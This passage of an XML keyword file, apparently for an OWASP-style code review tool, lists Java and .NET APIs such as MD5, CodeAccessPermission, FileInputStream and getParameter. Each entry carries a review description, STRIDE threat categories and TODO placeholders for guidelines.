</KeyPointer>
<KeyPointer>
<k_name>SHA</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>MD5</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>base64</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.RequestMinimum</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.RequestOptional</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Assert</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Debug.Assert</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CodeAccessPermission</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlEvidence</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.SerializationFormatter</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlPrincipal</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlDomainPolicy</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlPolicy</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Java.io</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>FileInputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>FilterInputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SequenceInputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StringBufferInputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>BufferedReader</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ByteArrayInputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CharArrayReader</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StreamTokenizer</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getResourceAsStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ConfigurationSettings</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config holds information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>authentication mode</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config holds information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>allow</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config holds information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameterValues</k_name>
<k_level>2</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameter</k_name>
<k_level>2</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameterMap</k_name>
<k_level>2</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getScheme</k_name>
<k_level>2</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getProtocol</k_name>
<k_level>2</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getContentType</k_name>
<k_level>2</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getServerName</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request; the server name is typically taken from the client-supplied Host header.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRemoteAddr</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request. The remote address is the TCP peer, which behind a proxy or load balancer is the proxy itself; any address taken from a forwarding header instead is client-controlled.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRemoteHost</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request. The remote host name comes from a reverse DNS lookup of the peer address and must not be used for access control decisions.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRealPath</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request. A virtual path derived from request data and passed to getRealPath() is a path traversal candidate.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getLocalName</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getAttribute</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getAttributeNames</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getLocalAddr</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getAuthType</k_name>
<k_level>2</k_level>
<k_description>getAuthType() returns the name of the authentication scheme used to protect the servlet (BASIC, FORM, CLIENT_CERT or DIGEST), or null if the request was not authenticated. The value depends on the container&apos;s configuration rather than on the application, so code that branches on it should not assume a particular scheme and must handle the null case.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRemoteUser</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request; getRemoteUser() returns null when the container has not authenticated the request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getCookies</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request; cookie names and values are entirely client-controlled.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>isSecure</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request; check that isSecure() is the basis for any decision to send sensitive data or cookies.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpServletRequest</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getQueryString</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request; getQueryString() returns the raw, undecoded query string.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getHeader</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getPrincipal</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>isUserInRole</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Castor</k_name>
<k_level>2</k_level>
<k_description>If we can identify the major architectural components within the application right away, it helps narrow our search: we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>org.exolab.castor</k_name>
<k_level>2</k_level>
<k_description>If we can identify the major architectural components within the application right away, it helps narrow our search: we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### JAXB</k_name>
<k_level>2</k_level>
<k_description>If we can identify the major architectural components within the application right away, it helps narrow our search: we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.xml</k_name>
<k_level>2</k_level>
<k_description>If we can identify the major architectural components within the application right away, it helps narrow our search: we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### JMS</k_name>
<k_level>2</k_level>
<k_description>If we can identify the major architectural components within the application right away, it helps narrow our search: we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>JMS</k_name>
<k_level>2</k_level>
<k_description>If we can identify the major architectural components within the application right away, it helps narrow our search: we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
